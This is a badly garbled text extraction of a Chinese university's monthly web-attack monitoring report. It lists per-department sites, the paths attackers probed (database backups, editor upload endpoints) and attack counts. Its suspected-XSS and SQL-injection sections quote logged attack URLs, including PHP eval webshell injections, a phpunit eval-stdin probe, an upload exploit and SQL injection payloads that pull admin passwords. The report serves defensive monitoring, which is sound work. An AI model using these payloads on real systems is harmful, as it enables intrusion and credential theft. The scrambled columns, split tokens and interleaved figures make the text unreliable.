C ommand=FileUpload&Type=File& CurrentFolder=%2F、 /admin/fckeditor/editor/filemana ger/upload/asp/upload.asp?
Com mand=FileUpload&Type=File&Cur 比上升
1.41%较上月增加565次,攻击占比上升0.44%较上月增加134次,攻击占比上升0.12%较上月增加128次,攻击占比上升0.11% 较上月增加61次,攻击占比上升0.08% 较上月增加95次,攻击占比上升0.08% rentFolder=%2F //include/dialog/select_soft_post. 信息学院 php、/HYTop.mdb、
7 /PowerEasy2005.mdb、 137 ()
/PowerEasy2006.mdb、 /PowerEasy6.mdb //include/dialog/select_soft_post. php、 //skin/default/images/logo.gif/1.p 8
新闻网hp、99()/include/dialog/select_soft_post. php、//UserFiles/File/aaa
(1).cer、 /UploadFiles/.c er 审计处 /db.sql、/error.log、/database.sql、
9 (
/private.mdb、/schema.sql 97 ) 党委宣传部 /inc/conn_db.inc、 //include/dialog/select_soft_post.
10(xuanchuan.xaufe.ephp、/install.log、/database.sql、87 ) /installinstall.log //include/dialog/select_soft_post. 研究生部 php、 11(yanjiusheng.xaufe.e/UploadFiles/.c80 ) er、/asp/main.cer、/HYTop.mdb、 /backup.sql /UploadFiles/.c er、 经济学院 /include/dialog/select_soft_post. 12 php、 65 ()//editor/db/%23ewebeditor.mdb、 //editor/db/ewebeditor.mdb、 /a_d/install/data.sql 体育部 //include/dialog/select_soft_post. php、/xaufe.sql、/conn.inc、 13
(/connectconnect.inc、 65 )/databasedatabase.inc 团委 //skin/default/images/logo.gif/1.p 14(tuanwei.xaufe.edu.hp、 62 cn) /include/dialog/select_soft_post. 较上月增加67次,攻击占比上升0.08% 较上月减少152次,攻击占比下降0.01% 较上月增加94次,攻击占比上升0.07%较上月增加41次,攻击占比上升0.05%较上月增加6次,攻击占比上升0.04% 较上月减少2次,攻击占比上升0.03% 较上月减少1104次,攻击占比下降0.31%较上月减少82次,攻击占比 php、 //include/dialog/select_soft_post. php、/HYTop.mdb、/backup.sql /databackup/dvbbs7.mdb、 //include/dialog/select_soft_post. 统计学院 php、 15
()/admin/data/qcdn_news.mdb、53 /bbs/databackup/dvbbs7.mdb、 /data/dvbbs7.mdb 院报-在线阅读 /include/dialog/select_soft_post. 16 php、/HYTop.mdb、/conn.inc、
53 ()/connconn.inc、/connect.inc 图书馆17() /include/dialog/select_soft_post.php、//skin/default/images/logo.gif/1.php、42/UploadFiles/File/fbf577f55d1c43748dfe69aa7587ba64.cer、mon/settings/schemas/main.cer、/files/presspoint/main.cer 实验实训教学管理//include/dialog/select_soft_post. 18中心 php、/backup.sql、/database.sql、42 ()/db.sql、// 学科办 /database.sql、/xaufe.sql、 19(xuekeban.xaufe.edu/HYTop.mdb、/backup.sql、 36 ) /bak.sql //include/dialog/select_soft_post. php、 公共管理学院 //index.php/Home/AppUpload/co 20
(gongguan.xaufe.edmmentUpload、 35 ) //index.php?
s=/admin/upload/upl oadfile、/API/api.config、 /HYTop.mdb //skin/default/images/logo.gif/1.p 21
精品课程hp、/xaufe.sql、31()//include/dialog/select_soft_post. php、/HYTop.mdb、/a.bak 22两学一做学习教育//skin/default/images/logo.gif/1.p30 下降0% 较上月增加13次,攻击占比上升0.03% 较上月增加25次,攻击占比上升0.03% 较上月减少21次,攻击占比上升0.01% 较上月增加22次,攻击占比上升0.02%较上月增加30次,攻击占比上升0.03% 较上月增加26次,攻击占比上升0.03% 较上月减少22次,攻击占比下降0%较上月减 专题网 hp、 ()/include/dialog/select_soft_post. php、/xaufe.sql、/HYTop.mdb、 /backup.sql //skin/default/images/logo.gif/1.p hp、/HYTop.mdb、 交流与合作 /include/dialog/select_soft_post. 23
(guojiao.xaufe.edu.cphp、 29 n) /admin/edit/db/ewebeditor.mdb、 /admin/editor/db/ewebeditor.md b /UploadFiles/.c er、 继续教育学院(培
/UploadFiles/File/fbf577f55d1c43 24训中心) 748dfe69aa7587ba64.cer、28 mon/settings/schemas/main ().cer、/files/presspoint/main.cer、 //include/dialog/select_soft_post. php 后勤服务集团 /HYTop.mdb、/backup.sql、 25
(houqin.xaufe.edu.c/bak.sql、/data.mdb、/data.sql26 n) /database.inc、 科研处 //include/dialog/select_soft_post. 26()php、/API/api.config、 21 /HYTop.mdb、/backup.sql /include/dialog/select_soft_post. 校友总会 php、 27
(xiaoyou.xaufe.edu.c//skin/default/images/logo.gif/1.p21 n) hp、/HYTop.mdb、/backup.sql、 /bak.sql //skin/default/images/logo.gif/1.p 一站式服务平台hp、 28 /include/dialog/select_soft_post.20 ()php、/_vti_pvt/authors.pwd、 /backup.sql、/database.sql /include/dialog/select_soft_post. 校情民意管理平台
php、 29 //skin/default/images/logo.gif/1.p20 ()hp、 //include/dialog/select_soft_post. 少30次,攻击占比下降0% 较上月增加5次,攻击占比上升0.01% 较上月增加15次,攻击占比上升0.02% 较上月增加11次,攻击占比上升0.02%较上月减少26次,攻击占比上升0.01%较上月减少76次,攻击占比下降0.01% 较上月减少1次,攻击占比下降0% 较上月减少14次,攻击占比下降0% php、/HYTop.mdb、/backup.sql //skin/default/images/logo.gif/1.p 财务信息网30() hp、/include/dialog/select_soft_post.18php、/HYTop.mdb、/backup.sql、 /bak.sql /inc/conn_db.inc、 中国(西安)丝绸/databackup/dvbbs7.mdb、 31之路研究院 /database/PowerEasy4.mdb、 18 ()/database/PowerEasy5.mdb、 /admin/data/qcdn_news.mdb //public/images/skype/skype_1.gi 合作发展处 f/1.php、 32 //skin/default/images/logo.gif/1.p
17 ()hp、/API/api.config、/HYTop.mdb、 /a_d/install/data.sql /HYTop.mdb、 //include/dialog/select_soft_post. php、 /admin/include/uploadify.php?
ta 期刊管理中心 blepre=xx&met_lang=met_lang&l 33
()&met_admin_table=met_a17 dmin_table%20where%20usertyp e=3%23&metinfo_admin_id=1&m etinfo_admin_pass=2&type=upfil e&met_file_format=jpg|pphphp、 /backup.sql、/bak.sql //skin/default/images/logo.gif/1.p 34
(ne.hp、/HYTop.mdb、/backup.sql、16 ) /bak.sql、/data.sql //skin/default/images/logo.gif/1.p35(hp、/HYTop.mdb、/backup.sql、16 )/bak.sql、/data.sql 法学院 /API/api.config、/HYTop.mdb、 36()/a_d/install/data.sql、/backup.sql、15 /bak.sql 工会 //include/dialog/select_soft_post. 37(gonghui.xaufe.edu.php、15 /include/dialog/select_soft_post. cn) php、/HYTop.mdb、/backup.sql、 较上月减少39次,攻击占比下降0.01% 较上月减少12次,攻击占比下降0% 较上月减少6次,攻击占比下降0% 较上月减少124次,攻击占比下降0.03% 较上月减少25次,攻击占比下降0%较上月减少7次,攻击占比下降0%较上月增加9次,攻击占比上升0.01%较上月增加8次,攻击占比上升 /bak.sql 管理学院 //include/dialog/select_soft_post. 38(php、/HYTop.mdb、/backup.sql、15 ) /bak.sql、/data.sql //skin/default/images/logo.gif/1.p 39(whp、/HYTop.mdb、/backup.sql、15 ) /bak.sql、/data.sql 人事处 //db.mdb、//db.sql、/HYTop.mdb、 40(/backup.sql、/bak.sql 14 ) 保卫处 //include/dialog/select_soft_post. 41(baowei.xaufe.edu.cphp、/HYTop.mdb、/backup.sql、13 n) /bak.sql、/data.sql 纪委 //include/dialog/select_soft_post. 42 php、/HYTop.mdb、/backup.sql、
13 ()/bak.sql、/data.sql 离退休人员管理处//XACJXY.gif/.php、/HYTop.mdb、43()/backup.sql、/bak.sql、/data.sql13 党委统战部 //styles/prosilver/notexist_path.cf g、//styles/prosilver/style.cfg、 44(tongzhan.xaufe.edu/HYTop.mdb、/backup.sql、 13 )/bak.sql 高等教育研究所网/HYTop.mdb、/backup.sql、45站()/bak.sql、/data.sql、/database.sql11 国有资产管理处/HYTop.mdb、/backup.sql、46()/bak.sql、/data.sql、/database.sql11 0.01%较上月减少24次,攻击占比下降0%较上月减少317次,攻击占比下降0.09%较上月减少36次,攻击占比下降0.01%较上月增加2次,攻击占比上升0.01%较上月减少2次,攻击占比上升0.01%较上月增加12次,攻击占比上升0.01% 较上月--,攻击占比-- 较上月增加4次,攻击占比上升0.01%较上月增加10次,攻击占比上升0.01% 机关党总支 /HYTop.mdb、/backup.sql、 47()/bak.sql、/data.sql、/database.sql11 基建处 /HYTop.mdb、/backup.sql、 48()/bak.sql、/data.sql、/database.sql11 教务管理 /HYTop.mdb、/backup.sql、 49()/bak.sql、/data.sql、/database.sql11 深入学习实践科学/HYTop.mdb、/backup.sql、11 50发展观专题网 /bak.sql、/data.sql、/database.sql () 较上月增加9次,攻击占比上升0.01%较上月增加7次,攻击占比上升0.01%较上月减少22次,攻击占比下降0% 较上月--,攻击占比-- 3.1.4疑似跨站攻击 【描述】攻击者利用网站漏洞把恶意脚本代码注入到网页中,当其他用户浏览这 些网页时,就会执行其中的恶意代码,对受害用户可能采取Cookies资料窃取、 会话劫持、钓鱼欺骗等各种攻击。
攻击风险等级:高。
【攻击详情】 序号
1 站点 首页() 目的地址TOP5//data/cache/asd.php、//data/cache/flye.php、//plus/read.php、//plus/result.php、/utility/convert/data/config.inc.php 攻击次数9822 //data/cache/asd.php、 新闻网 //plus/read.php、
2 ()//plus/result.php、 4263 //data/cache/flye.php、//fuck.php 体育部 //data/cache/asd.php、
3 (
//data/cache/flye.php、 2101 对比分析 较上月减少8229次,攻击占比上升1.59% 较上月减少2820次,攻击占比上升0.92%较上月减少220 ) //plus/read.php、 //plus/result.php、//fuck.php //data/cache/asd.php、 图书馆 //plus/result.php、
4 /utility/convert/data/config.inc.ph
1737 ()p、//plus/read.php、 //data/cache/flye.php //data/cache/asd.php、 本科招生信息网//data/cache/flye.php、
5 (zhaosheng.xaufe.ed//plus/read.php、 1609 ) //plus/result.php、 //plus/mytag_js.php?
aid=9527 /utility/convert/data/config.inc.ph 校友总会 p、//data/cache/asd.php、
6 (xiaoyou.xaufe.edu.c
//plus/read.php、 1472 n) //data/cache/flye.php、 //plus/result.php 研究生部 //data/cache/asd.php、 //data/cache/flye.php、
7 (yanjiusheng.xaufe.e
//plus/read.php、 1431 ) //plus/result.php、//fuck.php //plus/read.php、 经济学院 //data/cache/flye.php、
8 ()
//plus/result.php、 1367 //data/cache/asd.php、//fuck.php 教务 //data/cache/asd.php、 //data/cache/flye.php、
9 (jiaowu.xaufe.edu.c
//plus/read.php、 n) //plus/result.php、//fuck.php //data/cache/asd.php、 继续教育学院(培//data/cache/flye.php、 10训中心) //plus/read.php、 ()//plus/result.php、 //plus/moon.php //data/cache/asd.php、 信息学院 //plus/read.php、 11 //data/cache/flye.php、 ()
//plus/result.php、 //plus/moon.php 12商学院 //data/cache/asd.php、 1301125911281091 次,攻击占比上升0.81%较上月减少417次,攻击占比上升0.6%较上月减少753次,攻击占比上升0.44%较上月减少1756次,攻击占比上升0.08%较上月减少464次,攻击占比上升0.45%较上月减少3825次,攻击占比下降0.6%较上月增加187次,攻击占比上升0.6%较上月增加233次,攻击占比上升0.6%较上月减少9547次,攻击占比下降2.43%较上月增 () //plus/read.php、//data/cache/flye.php、//plus/result.php、//fuck.php //data/cache/asd.php、 精品课程 //data/cache/flye.php、 13()//plus/read.php、//fuck.php、969 //plus/result.php //data/cache/asd.php、 实验实训教学管理//data/cache/flye.php、 14中心 //plus/result.php、 884 ()/utility/convert/data/config.inc.ph p、/1.php //data/cache/asd.php、 团委 //data/cache/flye.php、 15
(tuanwei.xaufe.edu.//plus/result.php、 874 cn) //plus/read.php、 //plus/moon.php 中国(西安)丝绸//data/cache/asd.php、 16之路研究院 //plus/read.php、 821 //data/cache/flye.php、 ()//fuck.php、//plus/result.php //data/cache/asd.php、 统计学院 //plus/read.php、 17()//plus/result.php、 770 //data/cache/flye.php、//fuck.php 党委宣传部 //data/cache/asd.php、 //plus/read.php、 18
(xuanchuan.xaufe.e//plus/result.php、 671 ) //data/cache/flye.php、//fuck.php //data/cache/asd.php、 期刊管理中心 //data/cache/flye.php、 19
()//admin.php/module/action/para655 m1/$%7B@eval($_POST%5Bc%5D )%7D、//fuck.php、//plus/read.php 文学院 //data/cache/flye.php、 //data/cache/asd.php、 20
(wenxue.xaufe.edu.c//plus/read.php、 532 n) //plus/result.php、//fuck.php 加211次,攻击占比上升0.51%较上月减少1146次,攻击占比上升0.06%较上月增加139次,攻击占比上升0.41%较上月减少943次,攻击占比上升0.08%较上月减少404次,攻击占比上升0.22%较上月减少849次,攻击占比上升0.06%较上月减少184次,攻击占比上升0.22%较上月减少356次,攻击占比上升0.16%较上月减少329次,攻击占比上升0.12% 保卫处 //data/cache/asd.php、 //plus/read.php、 21(baowei.xaufe.edu.c//data/cache/flye.php、 490 n) //fuck.php、//plus/result.php 信息与教育技术中//data/cache/asd.php、 22心 //plus/read.php、443 //plus/result.php、 ()//data/cache/flye.php、//fuck.php /1.php、//data/cache/flye.php、 基建处 /index.php?
m=formguide&c=inde 23 x&a=show&formid=1&siteid=
1、
398 ()//data/cache/asd.php、 //plus/read.php //data/cache/asd.php、 管理学院 //data/cache/flye.php、 24
(//index.php/module/action/para354 ) m1/$%7B@eval($_POST%5Bc%5D )%7D、//plus/read.php、//fuck.php 公共管理学院 //data/cache/asd.php、 //data/cache/flye.php、
25(gongguan.xaufe.ed//fuck.php、//plus/read.php、351 ) //plus/result.php 人事处 /、//plus/mytag_js.php?
aid=9090、 //data/cache/flye.php、 26
(//plus/ad_js.php?
aid=8888、 319 )//plus/mytag_js.php?
aid=9527 /、//data/cache/asd.php、 档案馆 //data/cache/flye.php、 27()//plus/moon.php、 317 //plus/read.php //plus/mytag_js.php?
aid=9527、 教学评估中心 //plus/mytag_js.php?
aid=9090、/、 28 //bbs/utility/convert/data/config.i
311 ()nc.php、 //plus/ad_js.php?
aid=8888 /utility/convert/data/config.inc.ph 29经济管理虚拟仿真p、/1.php、308()/bbs/utility/convert/data/config.i nc.php、 较上月减少9722次,攻击占比下降2.75%较上月减少1126次,攻击占比下降0.16%较上月减少677次,攻击占比下降0.04%较上月减少320次,攻击占比上升0.05%较上月减少139次,攻击占比上升0.1%较上月减少510次,攻击占比下降0.02%较上月增加81次,攻击占比上升0.16%较上月减少1157次,攻击占比下降0.23%较上月增加126次,攻击占比上升 /index.php?
m=formguide&c=index&a=show&formid=1&siteid=1、/images/swfupload/images/uploadye.php 党政办公室 //data/cache/asd.php、 //data/cache/flye.php、30(dangzheng.xaufe.ed//fuck.php、//plus/read.php、296 ) //plus/result.php //data/cache/asd.php、 财务信息网 //plus/read.php、 31 //data/cache/flye.php、 289 ()
//plus/moon.php、 //plus/result.php //data/cache/asd.php、 纪委 //data/cache/flye.php、 32()//plus/read.php、 205 //plus/result.php、//fuck.php //data/cache/asd.php、 后勤服务集团 //plus/result.php、 33
(houqin.xaufe.edu.c//data/cache/flye.php、 197 n) //plus/moon.php、 //plus/read.php //plus/mytag_js.php?
aid=9527、 校情民意管理平台
//plus/read.php、 34 //plus/result.php、 180 ()//data/cache/asd.php、 //data/cache/flye.php 外国语学院首页//data/cache/asd.php、//data/cache/flye.php、 35(//fuck.php、//plus/read.php、174)//plus/result.php 工会 //data/cache/asd.php、 //data/cache/flye.php、 36(gonghui.xaufe.edu.//plus/read.php、 156 cn) //plus/result.php、//fuck.php /admin.php/module/action/para 学工部 m1/$%7B@eval($_POST%5Bc%5D 37
(xuegong.xaufe.edu.)%7D、155 /tool/zhongcaoyao/?
q=${@print( cn) eval($_POST[abc]))}、 /aaaaaaaaaaaaaa.asp;.jpg、 0.16% 较上月减
少2020次,攻击占比下降0.49%较上月减少842次,攻击占比下降0.13%较上月减少207次,攻击占比上升0.02%较上月减少130次,攻击占比上升0.04%较上月减少551次,攻击占比下降0.09%较上月减少257次,攻击占比下降0%较上月减少458次,攻击占比下降0.08% 较上月增加55次,攻击占比上升0.08% /plus/ad_js.php?
aid=8888、 /plus/mytag_js.php?
aid=511348 //data/cache/asd.php、 高等教育研究所网
//data/cache/flye.php、38站()//plus/result.php、//fuck.php、152 //plus/read.php //plus/result.php、 //data/cache/asd.php、 科研处 //data/cache/flye.php、 39
()//plus/read.php、 138 //meng/?
q={${eval%28$_POST[% 27Rainy%27]%29}} 两学一做学习教育//data/cache/asd.php、 40专题网 //plus/read.php、 138 //data/cache/flye.php、 ()//plus/result.php、//fuck.php 党委组织部 //data/cache/asd.php、 //data/cache/flye.php、41(zuzhibu.xaufe.edu.c//fuck.php、//plus/read.php、126 n)//plus/result.php //data/cache/asd.php、 离退休人员管理处//data/cache/flye.php、 42()//plus/read.php、 111 //plus/result.php、//fuck.php //data/cache/flye.php、 合作发展处 //data/cache/asd.php、 43
()//plus/moon.php、 103 //plus/read.php、//plus/result.php //data/cache/flye.php、 法学院 //data/cache/asd.php、 44
()//plus/read.php、//fuck.php、96 //plus/result.php 交流与合作 //data/cache/flye.php、 //data/cache/asd.php、 45(guojiao.xaufe.edu.c//plus/moon.php、 79 n) //plus/read.php、//plus/result.php 一站式服务平台//data/cache/asd.php、 46()//plus/read.php、 73 较上月减少205次,攻击占比下降0% 较上月减少332次,攻击占比下降0.04% 较上月减少978次,攻击占比下降0.24%较上月减少330次,攻击占比下降0.05%较上月减少410次,攻击占比下降0.08%较上月减少345次,攻击占比下降0.07%较上月减少270次,攻击占比下降0.04%较上月减少1126次,攻击占比下降0.31%较上月减少841 //plus/result.php、/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php、//data/cache/flye.php 学科办 //plus/read.php、 //plus/result.php、//test.php、 47(xuekeban.xaufe.edu//data/cache/asd.php、 66 )//data/cache/coco.php //data/cache/asd.php、 院报-在线阅读 //data/cache/flye.php、 48()//fuck.php、//plus/read.php、65 //plus/result.php /dxyylc/md5.aspx、 国有资产管理处/plus/bakup.hp、 49 /plus/mytag_j.php?
aid=6022、54 ()/plus/mytag_js.php?
aid=511348、 /plus/mytag_js.php?
aid=6022 /plus/mytag_js.php?
aid=511348、 教务管理 /plus/mytag_js.php?
aid=6022、 50 /plus/mytag_js.php?
aid=8080、
53 ()/plus/mytag_js.php?
aid=9090、 /plus/mytag_js.php?
aid=9191 次,攻击占比下降0.23% 较上月减少619次,攻击占比下降0.16%较上月增加11次,攻击占比上升0.03%较上月减少213次,攻击占比下降0.04%较上月增加44次,攻击占比上升0.04% 3.1.5SQL注入攻击 【描述】web应用程序对用户输入数据的合法性没有判断,攻击者可以在web 应用程序中事先定义好的查询语句的结尾上添加额外的SQL语句,以此来实现 欺骗数据库服务器执行非授权的任意查询,从而进一步得到相应的数据信息。
攻 击风险等级:高。
【攻击详情】 序号站点 首页1() 目的地址TOP5/General/Department.html、/General/ietc.html、/General/pgb.html、/General/gonghui.html、 攻击次数897 对比分析较上月减少1633次,攻击占比下降 /Links/Topic.html /gk.asp?
title=瀛﹂櫌浠嬬 粛%2F**%2Fand%2F**%2F1438% 3D1438、/gk.asp?
title=瀛﹂櫌浠 嬬 粛%2F**%2Fand%2F**%2F741%
3 D438、/gk.asp?
title=涓
叡瑗垮 畨璐㈢粡瀛﹂櫌鍟嗗闄㈠ 商学院 鍛樹
2 細%27%2F**%2Fand%2F**%2F%668 ()271438%27%3D%271438、 /gk.asp?
title=瀛﹂櫌浠嬬 粛%27%2F**%2Fand%2F**%2F% 271438%27%3D%271438、 /gk.asp?
title=涓
叡瑗垮畨璐㈢ 粡瀛﹂櫌鍟嗗闄㈠鍛樹 細%2F**%2Fand%2F**%2F741%
3 D438 /About.asp?
t=学院简 介%20and%201453=1453、 /About.asp?
t=学院简 介%20and%201453=1454、 信息学院 /About.asp?
t=学院简介
3 ()
'%20and%20'1'='1、/About.asp?
t=550 学院简介'%20and%20'1'='
2、 /About.asp?
t=学院简 介%27%2F**%2Fand%2F**%2F% 271438%27%3D%271438 /news_more.asp?
bigclassname= 学术研 究%27%2F**%2Fand%2F**%2F% 271438%27%3D%271438、 /news_more.asp?
bigclassname= 学术研 外国语学院首页
究%27%2F**%2Fand%2F**%2F% 4(27741%27%3D%27438、345 /news_more.asp?
bigclassname= ) 学术研 究%2F**%2Fand%2F**%2F1438% 3D1438、 /news_more.asp?
bigclassname= 学术研 究%2F**%2Fand%2F**%2F741%
3 D438、 0.12% 较上月增
加418次,攻击占比上升0.4% 较上月减少467次,攻击占比上升0.09% 较上月增加65次,攻击占比上升0.16% /news_more.asp?
bigclassname= 教学教 务%27%2F**%2Fand%2F**%2F% 27741%27%3D%27438 /login.asp?
doing=login、 /vendor/phpunit/phpunit/src/Util /PHP/eval-stdin.php、 /disp.asp?
dispid=%2f**%2fcOnVe Rt(int%2c(char(33)%2bchar(126)% 2bchar(33)%2b(char(65)%2bchar( 66)%2bchar(67)%2bchar(49)%2bc har(52)%2bchar(53)%2bchar(90)% 2bchar(81)%2bchar(54)%2bchar(
5 0)%2bchar(68)%2bchar(87)%2bch 基建处
5 ar(81)%2bchar(65)%2bchar(70)%2342 ()bchar(80)%2bchar(79)%2bchar(73 )%2bchar(89)%2bchar(67)%2bcha r(70)%2bchar(68))%2bchar(33)%
2 bchar(126)%2bchar(33)))、 /disp.asp?
dispid=340%27%20AnD %20sLeep%283%29%20ANd%20% 270%27%3D%270、 /HitCount.asp?
lx=Qianbo_about& id=1%20and%201=2%20union%
2 0select%20password%20from%20 qianbo_admin /search.html、 /vendor/phpunit/phpunit/src/Util /PHP/eval-stdin.php、 /news/html/?
0'union/**/select/* */1/**/from/**/(select/**/count( *),concat(floor(rand
(0)*2),0x3a,(s elect/**/concat(user,0x3a,passwo 体育部 rd)/**/from/**/pwn_base_admin
6 (
/**/limit/**/0,1),0x3a)a/**/from336 ) /**/information_schema.tables/* */group/**/by/**/a)b/**/where' 1'='1.html、 /HitCount.asp?
lx=Qianbo_about& id=1%20and%201=2%20union%
2 0select%20password%20from%20 qianbo_admin、 /flow.php?
step=update_cart
7 经济学院 /show.asp?
id=2777%2F**%2Fand
259 较上月增加93次,攻击占比上升0.17% 较上月增加148次,攻击占比上升0.18% 较上月减 ()%2F**%2F1438%3D1438、 /show.asp?
id=2777%2F**%2Fand %2F**%2F741%3D438、 /news/html/?
0'union/**/select/* */1/**/from/**/(select/**/count( *),concat(floor(rand
(0)*2),0x3a,(s elect/**/concat(user,0x3a,passwo rd)/**/from/**/pwn_base_admin /**/limit/**/0,1),0x3a)a/**/from /**/information_schema.tables/* */group/**/by/**/a)b/**/where' 1'='1.html、 /show.asp?
id=2777%27%2F**%2F and%2F**%2F%271438%27%3D% 271438、 /show.asp?
id=2777%27%2F**%2F and%2F**%2F%27741%27%3D%
2 7438 /vendor/phpunit/phpunit/src/Util /PHP/eval-stdin.php、 /about.asp?
T=联系我 们%27%2F**%2Fand%2F**%2F% 271438%27%3D%271438、 教务 /about.asp?
T=联系我
8 (jiaowu.xaufe.edu.c
们%27%2F**%2Fand%2F**%2F%215 n) 27741%27%3D%27438、 /about.asp?
T=联系我 们%2F**%2Fand%2F**%2F1438% 3D1438、/about.asp?
T=联系我 们%2F**%2Fand%2F**%2F741%
3 D438 实验实训教学管理
/node/、/template/、/search.jspx、213
9 中心 /info/、/template/1/bluewise/ () /vendor/phpunit/phpunit/src/Util /PHP/eval-stdin.php、 本科招生信息网
/news/html/?
0'union/**/select/* 10(zhaosheng.xaufe.ed*/1/**/from/**/(select/**/count(202 ) *),concat(floor(rand
(0)*2),0x3a,(s elect/**/concat(user,0x3a,passwo rd)/**/from/**/pwn_base_admin /**/limit/**/0,1),0x3a)a/**/from 少
35次,攻击占比上升0.1% 较上月增加78次,攻击占比上升0.11% 较上月增加186次,攻击占比上升0.14%较上月减少3438次,攻击占比下降0.96% /**/information_schema.tables/* */group/**/by/**/a)b/**/where' 1'='1.html、 /HitCount.asp?
lx=Qianbo_about& id=1%20and%201=2%20union%
2 0select%20password%20from%20 qianbo_admin、 /flow.php?
step=update_cart、 /teshu/show.asp?
id=353%20and% 201=
1 /vendor/phpunit/phpunit/src/Util /PHP/eval-stdin.php、 /HitCount.asp?
lx=Qianbo_about& i
声明:
该资讯来自于互联网网友发布,如有侵犯您的权益请联系我们。